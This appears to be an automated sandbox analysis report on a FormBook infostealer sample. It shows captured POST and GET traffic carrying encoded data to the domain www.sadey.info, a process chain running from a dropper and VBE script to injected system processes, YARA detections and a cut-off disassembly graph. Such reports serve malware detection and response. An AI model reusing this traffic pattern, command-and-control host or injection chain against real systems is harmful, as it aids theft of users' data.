                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.649996162.0.225.218803268C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:54.105756044 CET1812OUTPOST /f8et/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 1248
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.sadey.info
                                                                                            Origin: http://www.sadey.info
                                                                                            Referer: http://www.sadey.info/f8et/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 61 65 57 76 65 37 75 71 2f 49 48 74 42 76 71 69 35 74 49 52 31 4a 35 36 6f 4a 34 53 62 32 31 79 2b 2f 65 77 35 34 38 6c 45 56 71 65 59 63 69 4c 70 6c 54 36 73 6d 5a 72 68 70 75 49 68 47 34 57 71 70 4c 76 45 70 76 76 72 6d 47 2b 7a 68 56 46 75 46 54 4a 54 65 57 55 53 2f 4b 75 67 65 5a 51 58 6b 6c 6b 2b 2f 52 7a 48 63 71 41 57 42 36 34 4a 53 76 62 56 47 42 32 38 74 4d 49 39 74 59 6c 45 45 70 68 73 57 57 47 4a 34 52 56 74 70 51 6c 66 78 58 4f 4b 5a 72 62 4a 54 44 69 6a 55 79 4b 66 6d 46 59 2f 48 77 65 7a 71 71 59 49 31 2f 67 79 53 69 6e 62 6d 34 42 6c 6a 54 4a 76 66 62 7a 76 6c 58 66 41 53 50 55 39 6c 75 7a 71 72 79 4b 42 67 68 79 4e 44 44 7a 72 75 37 7a 73 42 62 61 57 30 48 48 4a 35 46 46 50 65 41 49 4a 74 45 35 47 31 6d 74 76 42 4d 4f 2b 78 54 55 30 5a 68 47 77 64 37 62 5a 4e 44 6d 41 49 4f 7a 46 71 6e 6a 76 75 69 47 4e 53 70 65 75 65 33 73 44 79 74 2f 4d 34 4e 58 72 56 58 71 48 63 6b 45 78 4c 6c 42 70 45 6c 71 74 58 34 52 64 6a 42 75 44 46 70 65 4d 41 53 70 38 62 33 65 44 56 [TRUNCATED]
                                                                                            Data Ascii: 8RN4oRq=aeWve7uq/IHtBvqi5tIR1J56oJ4Sb21y+/ew548lEVqeYciLplT6smZrhpuIhG4WqpLvEpvvrmG+zhVFuFTJTeWUS/KugeZQXklk+/RzHcqAWB64JSvbVGB28tMI9tYlEEphsWWGJ4RVtpQlfxXOKZrbJTDijUyKfmFY/HwezqqYI1/gySinbm4BljTJvfbzvlXfASPU9luzqryKBghyNDDzru7zsBbaW0HHJ5FFPeAIJtE5G1mtvBMO+xTU0ZhGwd7bZNDmAIOzFqnjvuiGNSpeue3sDyt/M4NXrVXqHckExLlBpElqtX4RdjBuDFpeMASp8b3eDVCK58rSp0KYgsn+R+Y8Y7SVJB0vJzgR+V6lhWaiYw0gW3VjZER1SeyFQirqJXxsPl0IfdYU+l5k0wuaP4Erbmo3bQw5EzgbLuOLJuvCzKId1puXv1/04Asfjve98luUIpHHckV90PqzqPk6KvWoW4nESgunKme04XppZRkqBdWi1IYm5L5nch3gysi8R00QGmTON2Fua4r+2iZZTjcSE7kNRifNfiyjPd0vzgEHDsHqTra4dZ9Utab185KeqjoUGVAFgwdm2zL4JLJvB+0vTKvgVfniG8E83shx+dlPqlDN3UpKP7SX9Wi69+H9h0JM5Cy78fnTyyvQTPU6RTxs1ajvQ44ke/NDm0Nm4BBSZ+1eeG31GJJbk1Sa52TVA07ey05TMKd7CSN8CRBPlNxYmgRAnihOsvqLWRK24TkpY+PRp7uWKTNzR+iM/PQP02OA3HOd5kfbQ2iSjjw00Ao3ZL3j92aQp0+yBYNW9lQwqvEU5pXOO/mJHYz7FuPpM5uWw0loRngcp52rwHnHvO7cvZY69Ln3C6O7Xfs9l8TcJpk/CDpOtBJhg3Gmou53QGvSYGAsEaSLyp/PfLa1+CK307PDl0zs/cZsa7z11JJL2bxbaJ4/NavZKW7FqXrmlGiWGqmuloGoIK8D3pFwCLA9OAB49GYl+5POaOth [TRUNCATED]
                                                                                            Nov 6, 2024 16:07:54.792356968 CET533INHTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:54 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                            12192.168.2.649997162.0.225.21880
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Nov 6, 2024 16:07:57.210938931 CET525OUTGET /f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            Host: www.sadey.info
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Nov 6, 2024 16:07:57.941618919 CET548INHTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:57 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:10:05:49
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\FS04dlvJrq.exe"
                                                                                            Imagebase:0xe60000
                                                                                            File size:1'336'477 bytes
                                                                                            MD5 hash:15227B37F486CB74C7676395A12C9296
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:10:05:54
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe"
                                                                                            Imagebase:0x810000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:10:06:03
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ipconfig /release
                                                                                            Imagebase:0x6c0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:bpqdpksed.icm vbepwhj.mp3
                                                                                            Imagebase:0xd60000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:10:06:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:10:06:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:10:06:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ipconfig /renew
                                                                                            Imagebase:0x6c0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:10:06:16
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0xa50000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:10:06:16
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0x350000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:19
                                                                                            Start time:10:06:16
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80
                                                                                            Imagebase:0x440000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:10:06:34
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe"
                                                                                            Imagebase:0xbb0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:10:06:37
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\EhStorAuthn.exe"
                                                                                            Imagebase:0x2a0000
                                                                                            File size:119'808 bytes
                                                                                            MD5 hash:0C9245FDD67B14B9E7FBEBB88C3A5E7F
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:23
                                                                                            Start time:10:06:51
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe"
                                                                                            Imagebase:0xbb0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:24
                                                                                            Start time:10:07:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x7ff728280000
                                                                                            File size:676'768 bytes
                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:10.7%
                                                                                              Total number of Nodes:1956
                                                                                              Total number of Limit Nodes:38
                                                                                              execution_graph 28161 e84b8a 28162 e84b33 28161->28162 28162->28161 28164 e84fce 28162->28164 28190 e84d2c 28164->28190 28166 e84fde 28167 e8503b 28166->28167 28168 e8505f 28166->28168 28169 e84f6c DloadReleaseSectionWriteAccess 8 API calls 28167->28169 28171 e850d7 LoadLibraryExA 28168->28171 28172 e85138 28168->28172 28180 e8514a 28168->28180 28184 e85206 28168->28184 28170 e85046 RaiseException 28169->28170 28185 e85234 28170->28185 28171->28172 28173 e850ea GetLastError 28171->28173 28174 e85143 FreeLibrary 28172->28174 28172->28180 28175 e850fd 28173->28175 28176 e85113 28173->28176 28174->28180 28175->28172 28175->28176 28178 e84f6c DloadReleaseSectionWriteAccess 8 API calls 28176->28178 28177 e851a8 GetProcAddress 28179 e851b8 GetLastError 28177->28179 28177->28184 28181 e8511e RaiseException 28178->28181 28182 e851cb 28179->28182 28180->28177 28180->28184 28181->28185 28182->28184 28186 e84f6c DloadReleaseSectionWriteAccess 8 API calls 28182->28186 28201 e84f6c 28184->28201 28185->28162 28187 e851ec RaiseException 28186->28187 28188 e84d2c ___delayLoadHelper2@8 8 API calls 28187->28188 28189 e85203 28188->28189 28189->28184 28191 e84d38 28190->28191 28192 e84d5e 28190->28192 28209 e84dd5 28191->28209 28192->28166 28194 e84d3d 28195 e84d59 28194->28195 28214 e84efe 28194->28214 28219 e84d5f GetModuleHandleW GetProcAddress GetProcAddress 28195->28219 28198 e84fa7 28199 e84fc3 28198->28199 28200 e84fbf RtlReleaseSRWLockExclusive 28198->28200 28199->28166 28200->28166 28202 e84f7e 28201->28202 28203 e84fa0 28201->28203 28204 e84dd5 DloadReleaseSectionWriteAccess 4 API calls 28202->28204 28203->28185 28205 e84f83 28204->28205 28206 e84f9b 28205->28206 28207 e84efe DloadProtectSection 3 API calls 28205->28207 28222 e84fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 28206->28222 28207->28206 28220 e84d5f GetModuleHandleW GetProcAddress GetProcAddress 28209->28220 28211 e84dda 28212 e84df2 RtlAcquireSRWLockExclusive 28211->28212 28213 e84df6 28211->28213 28212->28194 28213->28194 28215 e84f13 DloadProtectSection 28214->28215 28216 e84f4e VirtualProtect 28215->28216 28217 e84f19 28215->28217 28221 e84e14 VirtualQuery GetSystemInfo 28215->28221 28216->28217 28217->28195 28219->28198 28220->28211 28221->28216 28222->28203 28223 e70b05 28224 e70b17 __cftof 28223->28224 28227 e776e5 28224->28227 28230 e776a7 GetCurrentProcess GetProcessAffinityMask 28227->28230 28231 e70b6f 28230->28231 28232 e61125 28237 e676e7 28232->28237 28234 e6112a 28245 e86029 29 API calls 28234->28245 28236 e61134 28238 e676f3 __EH_prolog3 28237->28238 28246 e70aaf GetCurrentProcess GetProcessAffinityMask 28238->28246 28240 e676fd 28247 e74f2b 28240->28247 28242 e67874 28251 e67cba GetCurrentProcess GetProcessAffinityMask 28242->28251 28244 e67891 28244->28234 28245->28236 28246->28240 28248 e74f37 __EH_prolog3 28247->28248 28252 e61ece 